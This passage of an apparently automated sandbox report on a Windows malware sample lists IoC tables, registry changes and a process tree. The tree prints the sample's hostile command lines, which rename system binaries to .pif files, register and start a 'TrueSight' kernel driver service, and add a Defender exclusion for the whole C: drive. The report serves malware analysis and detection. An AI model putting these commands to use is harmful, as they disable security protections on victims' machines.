Key created	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\0	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\0\NodeSlot = "18"	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202020202020202020202020202	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\MRUListEx = 00000000ffffffff	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\MRUListEx = 00000000ffffffff	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\18\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\18\Shell	explorer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\Microsoft.Windows.ControlPanel\ShowCmd = "1"	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\0\MRUListEx = ffffffff	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 020000000100000000000000ffffffff	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202020202020202020202020202	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix	BackgroundTransferHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	BackgroundTransferHost.exe
Key created	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\MuiCache	BackgroundTransferHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\18\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "287309825"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\18\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{65F125E5-7BE1-4810-BA9D-D271C8432CE3}"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	BackgroundTransferHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:"	BackgroundTransferHost.exe
Key created	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\18	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\18\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix	BackgroundTransferHost.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202020202020202020202020202	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\Microsoft.Windows.ControlPanel	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2 = 14001f706806ee260aa0d7449371beb064c986830000	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0 = 0c0001008421de39050000000000	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\0 = 1e00718000000000000000000000e1a40ed25739d211a40b0c50205241530000	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:"	BackgroundTransferHost.exe
Key created	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings	control.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\Microsoft.Windows.ControlPanel\WFlags = "0"	explorer.exe

NTFS ADS 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\4e38df6415cd9a8857c5ff4185da103fa8585e8a589ff2286eaf7317e3d10755.zip:Zone.Identifier	chrome.exe
File opened for modification	C:\Users\Admin\Downloads\2578fed47caff2eefa4dda53358de9e0b1fd7835edcf54e3f99dac7dae759a82.zip:Zone.Identifier	chrome.exe

Opens file in notepad (likely ransom note) 2 IoCs

ransomware

pid	Process
1740	NOTEPAD.EXE
3388	NOTEPAD.EXE

Script User-Agent 24 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	255	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	281	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	298	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	166	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	227	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	257	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	229	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	251	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	186	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	232	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	235	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	241	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	266	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	278	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	177	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	183	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	247	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	284	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	288	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	292	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	295	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	300	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	174	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	204	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2232	explorer.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4192	svchost.pif
4192	svchost.pif
4192	svchost.pif
4192	svchost.pif
4192	svchost.pif
4192	svchost.pif
4084	aken.pif
4084	aken.pif
4192	svchost.pif
4192	svchost.pif
4192	svchost.pif
4192	svchost.pif
4192	svchost.pif
4192	svchost.pif
4192	svchost.pif
4192	svchost.pif
4192	svchost.pif
4192	svchost.pif
4192	svchost.pif
4192	svchost.pif
4192	svchost.pif
4192	svchost.pif
4192	svchost.pif
4192	svchost.pif
4192	svchost.pif
4192	svchost.pif
4192	svchost.pif
4192	svchost.pif
4192	svchost.pif
4192	svchost.pif
4192	svchost.pif
4192	svchost.pif
4192	svchost.pif
4192	svchost.pif
4192	svchost.pif
4192	svchost.pif
4192	svchost.pif
4192	svchost.pif
4192	svchost.pif
4192	svchost.pif
4192	svchost.pif
4192	svchost.pif
4192	svchost.pif
4192	svchost.pif
4192	svchost.pif
4192	svchost.pif
4192	svchost.pif
4192	svchost.pif
4192	svchost.pif
4192	svchost.pif
4192	svchost.pif
4192	svchost.pif
4192	svchost.pif
4192	svchost.pif
4192	svchost.pif
4192	svchost.pif
4192	svchost.pif
4192	svchost.pif
4192	svchost.pif
4192	svchost.pif
4192	svchost.pif
4192	svchost.pif
4192	svchost.pif
4192	svchost.pif

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
2232	explorer.exe
6000	taskmgr.exe

Suspicious behavior: LoadsDriver 3 IoCs

pid	Process
676	Process not Found
676	Process not Found
676	Process not Found

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

pid	Process
3940	chrome.exe
3940	chrome.exe
3940	chrome.exe
3940	chrome.exe
3940	chrome.exe
3940	chrome.exe
3940	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4084	aken.pif
Token: SeTakeOwnershipPrivilege	4332	hvphrsqL.pif
Token: SeDebugPrivilege	4332	hvphrsqL.pif
Token: SeAuditPrivilege	5624	fxssvc.exe
Token: SeRestorePrivilege	1164	TieringEngineService.exe
Token: SeManageVolumePrivilege	1164	TieringEngineService.exe
Token: SeAssignPrimaryTokenPrivilege	5416	AgentService.exe
Token: SeBackupPrivilege	1184	vssvc.exe
Token: SeRestorePrivilege	1184	vssvc.exe
Token: SeAuditPrivilege	1184	vssvc.exe
Token: SeBackupPrivilege	920	wbengine.exe
Token: SeRestorePrivilege	920	wbengine.exe
Token: SeSecurityPrivilege	920	wbengine.exe
Token: 33	2116	SearchIndexer.exe
Token: SeIncBasePriorityPrivilege	2116	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	2116	SearchIndexer.exe
Token: SeDebugPrivilege	4332	hvphrsqL.pif
Token: SeDebugPrivilege	4332	hvphrsqL.pif
Token: SeDebugPrivilege	4332	hvphrsqL.pif
Token: SeDebugPrivilege	4332	hvphrsqL.pif
Token: SeDebugPrivilege	4332	hvphrsqL.pif
Token: SeDebugPrivilege	3084	alg.exe
Token: SeDebugPrivilege	3084	alg.exe
Token: SeDebugPrivilege	3084	alg.exe
Token: SeShutdownPrivilege	5988	control.exe
Token: SeCreatePagefilePrivilege	5988	control.exe
Token: SeShutdownPrivilege	3940	chrome.exe
Token: SeCreatePagefilePrivilege	3940	chrome.exe
Token: SeShutdownPrivilege	3940	chrome.exe
Token: SeCreatePagefilePrivilege	3940	chrome.exe
Token: SeShutdownPrivilege	3940	chrome.exe
Token: SeCreatePagefilePrivilege	3940	chrome.exe
Token: SeShutdownPrivilege	3940	chrome.exe
Token: SeCreatePagefilePrivilege	3940	chrome.exe
Token: SeShutdownPrivilege	3940	chrome.exe
Token: SeCreatePagefilePrivilege	3940	chrome.exe
Token: SeShutdownPrivilege	3940	chrome.exe
Token: SeCreatePagefilePrivilege	3940	chrome.exe
Token: SeShutdownPrivilege	3940	chrome.exe
Token: SeCreatePagefilePrivilege	3940	chrome.exe
Token: SeShutdownPrivilege	3940	chrome.exe
Token: SeCreatePagefilePrivilege	3940	chrome.exe
Token: SeShutdownPrivilege	3940	chrome.exe
Token: SeCreatePagefilePrivilege	3940	chrome.exe
Token: SeShutdownPrivilege	3940	chrome.exe
Token: SeCreatePagefilePrivilege	3940	chrome.exe
Token: SeShutdownPrivilege	3940	chrome.exe
Token: SeCreatePagefilePrivilege	3940	chrome.exe
Token: SeShutdownPrivilege	3940	chrome.exe
Token: SeCreatePagefilePrivilege	3940	chrome.exe
Token: SeShutdownPrivilege	3940	chrome.exe
Token: SeCreatePagefilePrivilege	3940	chrome.exe
Token: SeShutdownPrivilege	3940	chrome.exe
Token: SeCreatePagefilePrivilege	3940	chrome.exe
Token: SeShutdownPrivilege	3940	chrome.exe
Token: SeCreatePagefilePrivilege	3940	chrome.exe
Token: SeDebugPrivilege	4408	DiagnosticsHub.StandardCollector.Service.exe
Token: SeShutdownPrivilege	3940	chrome.exe
Token: SeCreatePagefilePrivilege	3940	chrome.exe
Token: SeShutdownPrivilege	3940	chrome.exe
Token: SeCreatePagefilePrivilege	3940	chrome.exe
Token: SeShutdownPrivilege	3940	chrome.exe
Token: SeCreatePagefilePrivilege	3940	chrome.exe
Token: SeShutdownPrivilege	3940	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
2232	explorer.exe
3940	chrome.exe
3940	chrome.exe
3940	chrome.exe
3940	chrome.exe
3940	chrome.exe
3940	chrome.exe
3940	chrome.exe
3940	chrome.exe
3940	chrome.exe
3940	chrome.exe
3940	chrome.exe
3940	chrome.exe
3940	chrome.exe
3940	chrome.exe
3940	chrome.exe
3940	chrome.exe
3940	chrome.exe
3940	chrome.exe
3940	chrome.exe
3940	chrome.exe
3940	chrome.exe
3940	chrome.exe
3940	chrome.exe
3940	chrome.exe
3940	chrome.exe
3940	chrome.exe
3940	chrome.exe
3940	chrome.exe
3940	chrome.exe
3940	chrome.exe
3940	chrome.exe
3940	chrome.exe
3940	chrome.exe
5524	7zG.exe
6000	taskmgr.exe
6000	taskmgr.exe
6000	taskmgr.exe
6000	taskmgr.exe
6000	taskmgr.exe
6000	taskmgr.exe
6000	taskmgr.exe
6000	taskmgr.exe
6000	taskmgr.exe
6000	taskmgr.exe
6000	taskmgr.exe
6000	taskmgr.exe
6000	taskmgr.exe
6000	taskmgr.exe
6000	taskmgr.exe
6000	taskmgr.exe
6000	taskmgr.exe
6000	taskmgr.exe
6000	taskmgr.exe
6000	taskmgr.exe
6000	taskmgr.exe
6000	taskmgr.exe
6000	taskmgr.exe
6000	taskmgr.exe
6000	taskmgr.exe
6000	taskmgr.exe
6000	taskmgr.exe
6000	taskmgr.exe
6000	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
3940	chrome.exe
3940	chrome.exe
3940	chrome.exe
3940	chrome.exe
3940	chrome.exe
3940	chrome.exe
3940	chrome.exe
3940	chrome.exe
3940	chrome.exe
3940	chrome.exe
3940	chrome.exe
3940	chrome.exe
6000	taskmgr.exe
6000	taskmgr.exe
6000	taskmgr.exe
6000	taskmgr.exe
6000	taskmgr.exe
6000	taskmgr.exe
6000	taskmgr.exe
6000	taskmgr.exe
6000	taskmgr.exe
6000	taskmgr.exe
6000	taskmgr.exe
6000	taskmgr.exe
6000	taskmgr.exe
6000	taskmgr.exe
6000	taskmgr.exe
6000	taskmgr.exe
6000	taskmgr.exe
6000	taskmgr.exe
6000	taskmgr.exe
6000	taskmgr.exe
6000	taskmgr.exe
6000	taskmgr.exe
6000	taskmgr.exe
6000	taskmgr.exe
6000	taskmgr.exe
6000	taskmgr.exe
6000	taskmgr.exe
6000	taskmgr.exe
6000	taskmgr.exe
6000	taskmgr.exe
6000	taskmgr.exe
6000	taskmgr.exe
6000	taskmgr.exe
6000	taskmgr.exe
6000	taskmgr.exe
6000	taskmgr.exe
6000	taskmgr.exe
6000	taskmgr.exe
6000	taskmgr.exe
6000	taskmgr.exe
6000	taskmgr.exe
6000	taskmgr.exe
6000	taskmgr.exe
6000	taskmgr.exe
6000	taskmgr.exe
6000	taskmgr.exe
6000	taskmgr.exe
6000	taskmgr.exe
6000	taskmgr.exe
6000	taskmgr.exe
6000	taskmgr.exe
6000	taskmgr.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 384 wrote to memory of 4980	384	c9bac4ac565d31203a6de79955a300771c1ee41f72c227bebff984c83eaa409c.exe	77
PID 384 wrote to memory of 4980	384	c9bac4ac565d31203a6de79955a300771c1ee41f72c227bebff984c83eaa409c.exe	77
PID 384 wrote to memory of 4980	384	c9bac4ac565d31203a6de79955a300771c1ee41f72c227bebff984c83eaa409c.exe	77
PID 384 wrote to memory of 4560	384	c9bac4ac565d31203a6de79955a300771c1ee41f72c227bebff984c83eaa409c.exe	79
PID 384 wrote to memory of 4560	384	c9bac4ac565d31203a6de79955a300771c1ee41f72c227bebff984c83eaa409c.exe	79
PID 384 wrote to memory of 4560	384	c9bac4ac565d31203a6de79955a300771c1ee41f72c227bebff984c83eaa409c.exe	79
PID 4560 wrote to memory of 4192	4560	cmd.exe	81
PID 4560 wrote to memory of 4192	4560	cmd.exe	81
PID 4192 wrote to memory of 1924	4192	svchost.pif	82
PID 4192 wrote to memory of 1924	4192	svchost.pif	82
PID 1924 wrote to memory of 2276	1924	cmd.exe	84
PID 1924 wrote to memory of 2276	1924	cmd.exe	84
PID 1924 wrote to memory of 3004	1924	cmd.exe	85
PID 1924 wrote to memory of 3004	1924	cmd.exe	85
PID 1924 wrote to memory of 4068	1924	cmd.exe	86
PID 1924 wrote to memory of 4068	1924	cmd.exe	86
PID 1924 wrote to memory of 1248	1924	cmd.exe	87
PID 1924 wrote to memory of 1248	1924	cmd.exe	87
PID 1248 wrote to memory of 4172	1248	alpha.pif	88
PID 1248 wrote to memory of 4172	1248	alpha.pif	88
PID 1924 wrote to memory of 4432	1924	cmd.exe	89
PID 1924 wrote to memory of 4432	1924	cmd.exe	89
PID 4432 wrote to memory of 3300	4432	alpha.pif	90
PID 4432 wrote to memory of 3300	4432	alpha.pif	90
PID 1924 wrote to memory of 3324	1924	cmd.exe	91
PID 1924 wrote to memory of 3324	1924	cmd.exe	91
PID 3324 wrote to memory of 4084	3324	alpha.pif	92
PID 3324 wrote to memory of 4084	3324	alpha.pif	92
PID 384 wrote to memory of 4332	384	c9bac4ac565d31203a6de79955a300771c1ee41f72c227bebff984c83eaa409c.exe	97
PID 384 wrote to memory of 4332	384	c9bac4ac565d31203a6de79955a300771c1ee41f72c227bebff984c83eaa409c.exe	97
PID 384 wrote to memory of 4332	384	c9bac4ac565d31203a6de79955a300771c1ee41f72c227bebff984c83eaa409c.exe	97
PID 384 wrote to memory of 4332	384	c9bac4ac565d31203a6de79955a300771c1ee41f72c227bebff984c83eaa409c.exe	97
PID 384 wrote to memory of 4332	384	c9bac4ac565d31203a6de79955a300771c1ee41f72c227bebff984c83eaa409c.exe	97
PID 2116 wrote to memory of 2000	2116	SearchIndexer.exe	124
PID 2116 wrote to memory of 2000	2116	SearchIndexer.exe	124
PID 2116 wrote to memory of 5604	2116	SearchIndexer.exe	126
PID 2116 wrote to memory of 5604	2116	SearchIndexer.exe	126
PID 2116 wrote to memory of 3296	2116	SearchIndexer.exe	127
PID 2116 wrote to memory of 3296	2116	SearchIndexer.exe	127
PID 2232 wrote to memory of 4564	2232	explorer.exe	139
PID 2232 wrote to memory of 4564	2232	explorer.exe	139
PID 3940 wrote to memory of 4472	3940	chrome.exe	145
PID 3940 wrote to memory of 4472	3940	chrome.exe	145
PID 3940 wrote to memory of 132	3940	chrome.exe	146
PID 3940 wrote to memory of 132	3940	chrome.exe	146
PID 3940 wrote to memory of 132	3940	chrome.exe	146
PID 3940 wrote to memory of 132	3940	chrome.exe	146
PID 3940 wrote to memory of 132	3940	chrome.exe	146
PID 3940 wrote to memory of 132	3940	chrome.exe	146
PID 3940 wrote to memory of 132	3940	chrome.exe	146
PID 3940 wrote to memory of 132	3940	chrome.exe	146
PID 3940 wrote to memory of 132	3940	chrome.exe	146
PID 3940 wrote to memory of 132	3940	chrome.exe	146
PID 3940 wrote to memory of 132	3940	chrome.exe	146
PID 3940 wrote to memory of 132	3940	chrome.exe	146
PID 3940 wrote to memory of 132	3940	chrome.exe	146
PID 3940 wrote to memory of 132	3940	chrome.exe	146
PID 3940 wrote to memory of 132	3940	chrome.exe	146
PID 3940 wrote to memory of 132	3940	chrome.exe	146
PID 3940 wrote to memory of 132	3940	chrome.exe	146
PID 3940 wrote to memory of 132	3940	chrome.exe	146
PID 3940 wrote to memory of 132	3940	chrome.exe	146
PID 3940 wrote to memory of 132	3940	chrome.exe	146
PID 3940 wrote to memory of 132	3940	chrome.exe	146

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe

C:\Users\Admin\AppData\Local\Temp\c9bac4ac565d31203a6de79955a300771c1ee41f72c227bebff984c83eaa409c.exe
"C:\Users\Admin\AppData\Local\Temp\c9bac4ac565d31203a6de79955a300771c1ee41f72c227bebff984c83eaa409c.exe"
1⤵
- Adds Run key to start application
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:384
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Public\LqsrhpvhF.cmd" "
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4980
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4560
- - C:\Windows \SysWOW64\svchost.pif
    "C:\Windows \SysWOW64\svchost.pif"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:4192
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\NEO.cmd
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1924
    - - C:\Windows\system32\extrac32.exe
        
        extrac32 /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.pif
        5⤵
        
        PID:2276
    - - C:\Windows\system32\extrac32.exe
        
        extrac32 /C /Y C:\\Windows\\System32\\sc.exe C:\\Users\\Public\\Upha.pif
        5⤵
        
        PID:3004
    - - C:\Windows\system32\extrac32.exe
        
        extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\aken.pif
        5⤵
        
        PID:4068
    - - C:\Users\Public\alpha.pif
        
        C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\Upha.pif create TrueSight binPath="C:\Windows \SysWOW64\truesight.sys" type= kernel start= auto
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:1248
      - C:\Users\Public\Upha.pif
        
        C:\\Users\\Public\\Upha.pif create TrueSight binPath="C:\Windows \SysWOW64\truesight.sys" type= kernel start= auto
        6⤵
        Executes dropped EXE
        
        PID:4172
    - - C:\Users\Public\alpha.pif
        
        C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\Upha.pif start TrueSight
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:4432
      - C:\Users\Public\Upha.pif
        
        C:\\Users\\Public\\Upha.pif start TrueSight
        6⤵
        Executes dropped EXE
        
        PID:3300
    - - C:\Users\Public\alpha.pif
        
        C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\aken.pif -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath 'C:\'"
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:3324
      - C:\Users\Public\aken.pif
        
        C:\\Users\\Public\\aken.pif -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath 'C:\'"
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4084
- C:\Users\Public\Libraries\hvphrsqL.pif
  C:\Users\Public\Libraries\hvphrsqL.pif
  2⤵
  - Executes dropped EXE
  - Accesses Microsoft Outlook profiles
  - Drops file in System32 directory
  - Drops file in Program Files directory
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID:4332

C:\Windows\system32\BackgroundTransferHost.exe
"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.13
1⤵
- Modifies registry class
PID:4572

C:\Windows\System32\NOTEPAD.EXE
"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Desktop\RevokeSend.cmd
1⤵
- Opens file in notepad (likely ransom note)
PID:3388

C:\Windows\System32\alg.exe
C:\Windows\System32\alg.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:3084

C:\Windows\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
C:\Windows\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:4408

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s TapiSrv
1⤵
PID:1948

C:\Windows\system32\fxssvc.exe
C:\Windows\system32\fxssvc.exe
1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5624

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
- Executes dropped EXE
PID:5712

C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
"C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
1⤵
- Executes dropped EXE
PID:5812

C:\Windows\System32\msdtc.exe
C:\Windows\System32\msdtc.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
